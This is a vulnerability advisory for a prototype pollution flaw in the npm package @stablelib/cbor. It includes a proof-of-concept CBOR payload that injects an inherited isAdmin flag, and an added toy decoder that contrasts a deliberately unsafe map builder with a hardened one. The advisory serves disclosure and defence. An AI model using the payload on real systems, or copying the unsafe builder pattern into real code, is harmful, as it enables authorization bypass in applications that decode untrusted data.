PT-2026-32616 · npm · @stablelib/cbor
Published 2026-04-04 · Updated 2026-04-04
CVSS v4.0: 8.9 (High)
Vector: AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N
Summary
@stablelib/cbor decodes CBOR maps into ordinary JavaScript objects and assigns attacker-controlled keys directly onto those objects. A CBOR map key named __proto__ therefore changes the prototype of the decoded object instead of becoming an ordinary data property.
Details
The decoder builds map results with a plain {} and then stores attacker-controlled keys using bracket assignment. That is unsafe for special property names. In JavaScript, assigning to obj["__proto__"] on a normal object does not create a plain own property. It invokes the built-in __proto__ setter and replaces the object's prototype if the supplied value is an object or null.

As a result, a CBOR payload containing a map entry like:
- key: "__proto__"
- value: { isAdmin: true }

does not decode to an object with an own property called __proto__. It decodes to an object whose prototype is now attacker-controlled. Any code that later reads properties through normal lookup will see inherited attacker-supplied values.
PoC
```js
import { decode } from "@stablelib/cbor";

// CBOR:
// {
//   "__proto__": { "isAdmin": true }
// }
//
// a1                 map(1)
//    69              text(9)
//       "__proto__"
//    a1              map(1)
//       67           text(7)
//          "isAdmin"
//       f5           true
const payload = new Uint8Array([
  0xa1,
  0x69, 0x5f, 0x5f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x5f, 0x5f,
  0xa1,
  0x67, 0x69, 0x73, 0x41, 0x64, 0x6d, 0x69, 0x6e,
  0xf5
]);

const obj = decode(payload);
console.log(Object.hasOwn(obj, "isAdmin"));                    // false: not an own property
console.log(obj.isAdmin);                                      // true: inherited through the replaced prototype
console.log(Object.getPrototypeOf(obj).isAdmin);               // true
```
Impact
Any application that decodes untrusted CBOR into JavaScript objects can receive objects with attacker-controlled prototypes.
In practice, that can corrupt configuration objects, influence authorization checks, alter feature flags, and break application logic that relies on normal property lookup instead of strict own-property checks. If the decoded object is later merged into other objects, the impact can spread further.
Solution
Upgrade to version 2.0.4.
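The following is an added example, not code from @stablelib/cbor. It is a toy decoder for just the CBOR subset the PoC uses (unsigned integers, text strings, maps, and the simple values false/true/null), written so the map-building step is pluggable. unsafeMapBuilder reproduces the plain-object bracket-assignment pattern described under Details; hardenedMapBuilder shows the mitigation pattern of defining each key as an own data property with Object.defineProperty, which never invokes the __proto__ accessor (the same treatment JSON.parse gives that key). All function names are hypothetical, and hasExpectedPrototype is a post-decode check an application can run on any decoded map regardless of which library produced it.

```javascript
// Vulnerable pattern from the advisory: a plain {} filled by bracket
// assignment. A "__proto__" key hits the inherited setter and swaps the
// prototype instead of creating an own property. (Added example, not library code.)
function unsafeMapBuilder(entries) {
  const obj = {};
  for (const [key, value] of entries) obj[key] = value;
  return obj;
}

// Hardened builder: every key becomes an own data property. defineProperty
// bypasses the __proto__ accessor, so "__proto__" is stored as ordinary data.
// Non-text keys and duplicate keys are rejected instead of coerced/overwritten.
function hardenedMapBuilder(entries) {
  const obj = {};
  for (const [key, value] of entries) {
    if (typeof key !== "string") throw new Error("map keys must be text strings");
    if (Object.hasOwn(obj, key)) throw new Error("duplicate map key: " + key);
    Object.defineProperty(obj, key, { value, enumerable: true, writable: true, configurable: true });
  }
  return obj;
}

// Post-decode check: a decoded map should inherit only from Object.prototype.
function hasExpectedPrototype(obj) {
  return Object.getPrototypeOf(obj) === Object.prototype;
}

// Minimal CBOR decoder (hypothetical, subset only); mapBuilder selects the policy above.
function decodeCbor(bytes, { mapBuilder = hardenedMapBuilder } = {}) {
  const utf8 = new TextDecoder("utf-8", { fatal: true });
  let pos = 0;
  const need = (n) => { if (pos + n > bytes.length) throw new Error("unexpected end of input"); };

  // Additional-information field: 0..23 is the value itself; 24..26 mean
  // 1, 2 or 4 following bytes. 8-byte and indefinite-length forms are not handled.
  function readArgument(info) {
    if (info < 24) return info;
    const width = { 24: 1, 25: 2, 26: 4 }[info];
    if (width === undefined) throw new Error("unsupported argument encoding " + info);
    need(width);
    let value = 0;
    for (let i = 0; i < width; i++) value = value * 256 + bytes[pos++];
    return value;
  }

  function readItem() {
    need(1);
    const initial = bytes[pos++];
    const major = initial >> 5, info = initial & 0x1f;
    switch (major) {
      case 0: // unsigned integer
        return readArgument(info);
      case 3: { // text string
        const len = readArgument(info);
        need(len);
        const text = utf8.decode(bytes.subarray(pos, pos + len));
        pos += len;
        return text;
      }
      case 5: { // map: collect key/value pairs, then hand them to the builder
        const count = readArgument(info);
        const entries = [];
        for (let i = 0; i < count; i++) entries.push([readItem(), readItem()]);
        return mapBuilder(entries);
      }
      case 7: // simple values
        if (info === 20) return false;
        if (info === 21) return true;
        if (info === 22) return null;
        throw new Error("unsupported simple value " + info);
      default:
        throw new Error("unsupported major type " + major);
    }
  }

  const result = readItem();
  if (pos !== bytes.length) throw new Error("trailing bytes after CBOR item");
  return result;
}

// The advisory's payload: {"__proto__": {"isAdmin": true}}.
const ADVISORY_PAYLOAD = Uint8Array.from([
  0xa1,
  0x69, 0x5f, 0x5f, 0x70, 0x72, 0x6f, 0x74, 0x6f, 0x5f, 0x5f,
  0xa1,
  0x67, 0x69, 0x73, 0x41, 0x64, 0x6d, 0x69, 0x6e,
  0xf5,
]);

// Decode the same bytes both ways and report what a check relying on plain
// property lookup (e.g. `if (cfg.isAdmin)`) would see in each case.
function compare() {
  const polluted = decodeCbor(ADVISORY_PAYLOAD, { mapBuilder: unsafeMapBuilder });
  const hardened = decodeCbor(ADVISORY_PAYLOAD);
  return {
    unsafe:   { isAdmin: polluted.isAdmin, ownProto: Object.hasOwn(polluted, "__proto__"), ok: hasExpectedPrototype(polluted) },
    hardened: { isAdmin: hardened.isAdmin, ownProto: Object.hasOwn(hardened, "__proto__"), ok: hasExpectedPrototype(hardened) },
  };
}

console.log(compare());
```

With the unsafe builder, isAdmin reads as true through the replaced prototype while no own property of that name exists; with the hardened builder, __proto__ is an ordinary own key holding the nested map, isAdmin is undefined, and the object still inherits from Object.prototype. The same defineProperty pattern (or building maps on Object.create(null)) is the fix to look for when auditing any decoder that turns untrusted keys into object properties.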
Fix
Prototype Pollution
Affected Products
@stablelib/cbor